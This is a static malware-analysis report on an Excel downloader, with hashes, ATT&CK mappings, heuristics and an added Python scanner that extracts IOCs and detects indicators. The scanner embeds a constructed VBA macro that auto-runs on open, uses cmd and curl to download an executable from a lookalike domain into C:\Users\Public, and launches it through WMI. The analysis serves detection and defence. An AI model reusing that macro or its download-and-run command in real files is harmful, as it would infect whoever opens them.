Valyria — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 348d37d813ca44c3…

MALICIOUS

Office (OLE) / .XLS

Size: 26.5 KB
Created: 2022-01-08 17:02:42 (OLE document metadata; trivially forgeable, so not a reliable compile or authoring time)
Authoring application: Microsoft Excel
First seen: 2022-12-04
MD5: a3a7be7f733771ff24d6286ea49db98c
SHA-1: 9017cdc08851f162ae8ca54cfde0841526f4ebbf
SHA-256: 348d37d813ca44c373ddd848e39f0ec422982b57e23b502f5ed10a5c86829485
Risk score: 240

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1105 Ingress Tool Transfer

The Workbook_Open macro in the VBA source runs as soon as the workbook is opened with macros enabled. It launches a command shell that uses curl to download 'putty.exe' from 'https://thearth.li/~sgtatham/putty/latest/w32/putty.exe' and saves it as 'C:\Users\Public\pin77.exe' (a directory writable by any local user, so no elevation is needed); the macro then attempts to execute the downloaded file. This is downloader behaviour: auto-execution, command shell, ingress tool transfer, then execution of the fetched binary, consistent with the ClamAV detection 'Xls.Downloader.Valyria-10008445-0'. Note that curl.exe ships with Windows 10 1803 and later, so the download stage relies only on built-in OS tooling.

Heuristics (6)

  • ClamAV: Xls.Downloader.Valyria-10008445-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Valyria-10008445-0
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Auto-execution entry point: Workbook_Open fires when the workbook is opened with macros enabled, with no further user interaction.
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject binds to a COM/automation object by moniker (for example a WMI 'winmgmts:' namespace), a common way for macros to spawn a process without calling Shell directly.
  • cmd.exe reference in VBA [high] OLE_VBA_CMD
    The VBA source hands a command line to the Windows command shell (here the curl download and execution of the dropped file).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents and cases where source extraction fails, so the macro is flagged even when no readable source is available.
  • VBA macros detected [medium] OLE_VBA_MACROS
    Document contains VBA macro code
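As an added triage example (not the analysis service's rule engine, and not the carved macros.bas), the scanner below applies the same indicator classes the heuristics above report (auto-exec entry point, shell/object-execution tokens, download tokens) to decoded VBA source, extracts URL and drop-path IOCs, and re-joins string literals split with `&` so a concatenated URL is not missed. The macro text is constructed for the example and mirrors the reported behaviour (only the URL and drop path are taken from the report); the token lists are a deliberately small subset of what olevba checks. Feed it the VBA source that olevba extracts from a real sample.

```python
"""Triage of decoded VBA source for downloader indicators.

Added example; not the analysis service's rule engine and not the carved
macros.bas. SAMPLE_VBA is CONSTRUCTED to mirror the reported behaviour.
"""
import re
from dataclasses import dataclass, field

# Indicator classes mirroring the report's heuristics. These lists are a
# small subset of what olevba checks; extend them for production use.
AUTOEXEC_TOKENS = ("Workbook_Open", "Workbook_Activate", "Auto_Open",
                   "AutoOpen", "Document_Open", "AutoExec")
EXEC_TOKENS = ("cmd.exe", "cmd /c", "powershell", "Shell(", "WScript.Shell",
               "GetObject(", "CreateObject(", ".Run ", ".Exec(", "winmgmts")
DOWNLOAD_TOKENS = ("curl", "bitsadmin", "certutil", "URLDownloadToFile",
                   "XMLHTTP", "WinHttp", "Invoke-WebRequest", "wget")

URL_RE = re.compile(r'https?://[^\s"\'<>&]+', re.IGNORECASE)
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^\s"\'<>|*?]+')
# "abc" & "def"   or   "abc" & _ <newline> "def"   ->   one literal
SPLIT_LITERAL_RE = re.compile(r'"\s*&\s*(?:_\s*)?"')

# Constructed sample (NOT the real macros.bas); URL and drop path as reported.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    Dim dst As String, src As String, c As String
    dst = "C:\Users\Public\pin77.exe"
    ' URL split across literals to dodge naive string matching
    src = "https://thearth.li/~sgtatham/putty/" & _
          "latest/w32/putty.exe"
    c = "cmd.exe /c curl -o " & dst & " " & src & " && " & dst
    Set wmi = GetObject("winmgmts:")
    wmi.Get("Win32_Process").Create c, Null, Null, pid
End Sub
'''


@dataclass
class VbaTriage:
    autoexec: list = field(default_factory=list)
    exec_tokens: list = field(default_factory=list)
    download_tokens: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    paths: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # auto-run + fetch + execute is the downloader pattern in the report
        if self.autoexec and self.download_tokens and self.exec_tokens:
            return "downloader"
        if self.autoexec and (self.download_tokens or self.exec_tokens):
            return "suspicious"
        if self.exec_tokens or self.download_tokens or self.urls:
            return "review"
        return "no-indicators"


def normalize(src: str) -> str:
    """Re-join literals split with '&' (incl. '& _' line continuations)."""
    return SPLIT_LITERAL_RE.sub("", src)


def _found(tokens, text: str) -> list:
    # Case-insensitive substring match; a heuristic, so "curl" also hits "curly".
    low = text.lower()
    return [t for t in tokens if t.lower() in low]


def triage_vba(src: str) -> VbaTriage:
    """Scan decoded VBA source and return indicator hits plus IOCs."""
    text = normalize(src)
    return VbaTriage(
        autoexec=_found(AUTOEXEC_TOKENS, text),
        exec_tokens=_found(EXEC_TOKENS, text),
        download_tokens=_found(DOWNLOAD_TOKENS, text),
        urls=sorted(set(URL_RE.findall(text))),
        paths=sorted(set(WINPATH_RE.findall(text))),
    )


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print("verdict:", result.verdict)
    for name, value in vars(result).items():
        print(f"  {name}: {value}")
```

The literal re-join step is what makes the URL recoverable here: without it the regex would only see the first half of the split string. Anything more elaborate (Chr() sequences, StrReverse, Replace-based obfuscation) needs olevba's deobfuscation or a VBA emulator rather than regexes.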

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256:  24add1ea58e1c50679ff8d5562dbf748028a2cdef9edf3d20de068b4fb2c7ac9
Kind:     vba-macro
Source:   oletools.olevba.extract_macros (decoded VBA source)
Size:     1266 bytes